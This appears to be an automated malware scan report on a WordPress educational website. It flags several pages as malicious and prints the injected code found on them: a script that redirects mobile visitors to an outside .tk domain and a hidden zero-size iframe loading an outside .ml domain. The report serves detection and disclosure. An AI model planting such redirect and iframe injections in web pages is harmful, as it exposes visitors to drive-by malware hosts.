Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=utad-petel-edu.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.utad-petel-edu.org/ | 200 OK Content-Length: 23492 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://www.utad-petel-edu.org/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/plugins/gallery-plugin/fancybox/jquery.mousewheel-3.0.4.pack.js?ver=4.0.1 | 200 OK Content-Length: 1279 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/plugins/gallery-plugin/fancybox/jquery.fancybox-1.3.4.pack.js?ver=4.0.1 | 200 OK Content-Length: 15624 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/themes/utad/js/superfish.js?ver=1.0 | 200 OK Content-Length: 3700 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/themes/utad/js/custom.js?ver=1.0 | 200 OK Content-Length: 18064 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6684 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 16083 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 6423 Content-Type: application/javascript | clean |
http://www.utad-petel-edu.org/organigramme | 200 OK Content-Length: 19930 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://www.utad-petel-edu.org/formations-academiques/administration-des-affaires | 200 OK Content-Length: 23207 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://www.utad-petel-edu.org/formations-academiques/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 06 Mar 2015 11:02:13 GMT Location: http://www.utad-petel-edu.org/formations-academiques Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.utad-petel-edu.org/xmlrpc.php X-Powered-By: PHP/5.4.37 | clean |
http://www.utad-petel-edu.org/formations-academiques | 200 OK Content-Length: 19465 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://www.utad-petel-edu.org/formations-academiques/miage | 200 OK Content-Length: 25234 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://www.utad-petel-edu.org/formations-academiques/mines-et-geologie | 200 OK Content-Length: 29157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: utad-petel-edu.org
Result:
GET / HTTP/1.1
Host: utad-petel-edu.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: utad-petel-edu.org
Referer: http://www.google.com/search?q=utad-petel-edu.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: utad-petel-edu.org
Referer: http://www.google.com/search?q=utad-petel-edu.org
Result:
The result is similar to the first query. There are no suspicious redirects found.